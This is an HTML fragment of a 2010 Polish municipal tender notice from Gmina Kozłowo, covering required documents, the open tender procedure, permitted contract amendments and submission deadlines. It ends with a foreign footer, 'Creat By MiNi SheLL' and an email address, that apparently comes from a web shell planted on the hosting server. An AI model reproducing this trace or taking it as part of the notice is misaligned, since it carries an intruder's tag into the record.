<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>PEŁEN WYKAZ DOKUMENTÓW WYMAGANYCH PRZEZ ZAMAWIAJĄCEGO ZAWARTY JEST W SPECYFIKACJI
ISTOTNYCH WARUNKÓW ZAMÓWIENIA. OCENA SPEŁNIANIA WARUNKÓW W POSTĘPOWANIU BĘDZIE DOKONYWANA
Z ZASTOSOWANIEM FORMUŁY SPEŁNIA/NIESPEŁNIA.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa   w   sprawie   realizacji   zamówienia   publicznego   zawarta   zostanie   z                 uwzględnieniem postanowień wynikających z treści niniejszej SIWZ oraz danych              zawartych w ofercie. Zamawiający podpisze umowę z Wykonawcą, który przedłoży              najkorzystniejszą ofertę. Zamawiający zastrzega sobie prawo zmian nieistotnych              treści umowy oraz zmian dotyczących;
 1.   Zmiana terminu realizacji przedmiotu umowy

1.1	      zmiany spowodowane warunkami atmosferycznymi, w szczególności:
1.1.1     warunki    atmosferyczne    uniemożliwiające    prowadzenie    robót    budowlanych                zgodnie  z wymaganiami, przeprowadzanie  prób  i  sprawdzeń,            dokonywanie odbiorów;
1.1.2    klęski żywiołowe;




1.2    	zmiany    spowodowane    warunkami    geologicznymi,    terenowymi,           archeologicznymi, wodnymi itp. w szczególności:

1.2.1	odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie gruntu, skał, itp.);
1.2.2	odmienne od przyjętych w dokumentacji projektowej warunki terenowe w szczególności
istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych;
1.2.3	niewypały i niewybuchy, zagrożenie tąpnięciami, wybuchem;
1.2.4	wykopaliska archeologiczne, szkody górnicze, nie przewidywane w SIWZ ;

1.3	zmiany    będące    następstwem    okoliczności    leżących    po    stronie                Zamawiającego, w szczególności:
1.3.1	wstrzymanie realizacji umowy przez Zamawiającego;
1.3.2	konieczność   usunięcia   błędów   lub   wprowadzenia   zmian   w   dokumentacji   projektowej
lub dokumentacji technicznej urządzeń;

  1.4      zmiany będące następstwem działania organów administracji, w szczególności:

1.4.1	odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej,
1.4.2	wydanie postanowienia o wstrzymaniu robót budowlanych, w przypadku o którym mowa  w art. 50 ust. l ustawy Prawo budowlane
1.4.3	konieczność uzyskania wyroku sądowego, lub innego orzeczenia sądu lub organu, którego - konieczności nie przewidywano przy zawieraniu umowy
1.4.4	konieczność zaspokojenia roszczeń lub oczekiwań osób trzecich - w tym grup społecznych lub zawodowych nie artykułowanych  lub nie możliwych do jednoznacznego określenia w chwili zawierania umowy

    1.5	 inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy                skutkujące niemożliwością prowadzenia działań w celu wykonania umowy

           W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1.1 -       1.5  termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas        niezbędny do zakończenia  wykonywania jej przedmiotu w sposób należyty.
     2	Zmiany osobowe
2.1	zmiana   osób,   przy   pomocy   których   Wykonawca   realizuje   przedmiot   umowy   na   inne legitymujące    się    co    najmniej    równoważnymi    uprawnieniami, o    których    mowa w ustawie Prawo budowlane, prawo geologiczne i górnicze lub innych ustawach,
2.2	zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy, a od których wymagano   określonego   doświadczenia   lub   wykształcenia   na   inne    legitymujące   się doświadczeniem lub wykształceniem spełniającym wymóg SIWZ
2.3	zmiany inspektorów nadzoru inwestorskiego wskazanych w ofercie za uprzednią pisemną zgodą Zamawiającego. Wykonawca zaproponuje w następujących przypadkach,- śmierci, choroby lub innych zdarzeń losowych,- nie wywiązywania się z obowiązków wynikających z umowy.

3.	Zmiany organizacji spełniania świadczenia

3.1	zmiana zasad dokonywania odbiorów świadczonych usług lub robót, jeśli nie zmniejszy to zasad bezpieczeństwa i nie spowoduje zwiększenia kosztów dokonywania odbiorów, które obciążałyby Zamawiającego;

3.2.    zmiana treści dokumentów przedstawianych wzajemnie przez strony w trakcie           realizacji umowy lub sposobu informowania o realizacji umowy. Zmiana ta nie           może spowodować braku informacji niezbędnych Zamawiającemu do prawidłowej            realizacji umowy;

4.     Płatności

4.1	zmiany terminów  płatności  wynikające  z wszelkich  zmian  wprowadzanych  do  umowy, a także zmiany samoistne o ile nie spowodują konieczności zapłaty Wykonawcy odsetek wyższych niż odsetki od lokat na rachunku bieżącym zamawiającego;
4.2	zmiana sposobu  rozliczania umowy   lub dokonywania  płatności   częściowych  na  rzecz wykonawcy;.


5.	Pozostałe zmiany

5.1    Siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
5.2 Zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu
5.3   Wstrzymanie realizacji zamówienia przez właściwe służby i organy na skutek następstw nieszczęśliwych  wypadków przy pracy

6.	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych w szczególności:

6.1	ograniczenie przedmiotu świadczenia, jeśli taką możliwość przewidywała umowa

6.2	zmiana danych związanych z obsługą administracyjno - organizacyjną umowy            (np. zmiana nr rachunku bankowego)
63      zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między              Stronami; 



Wszystkie powyższe postanowienia stanowią katalog zmian na które Zamawiający może wyrazić zgodę lub nie bez podawania uzasadnienia odmowy. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody zarówno przez Zamawiającego jak i przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kozlowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Kozłowie
Kozłowo 60A
13-124 Kozłowo
pokój nr 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2010 godzina 12:00, miejsce: Urząd Gminy w Kozłowie
Kozłowo 60A
13-124 Kozłowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt
współfinansowany ze środków Unii Europejskiej w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com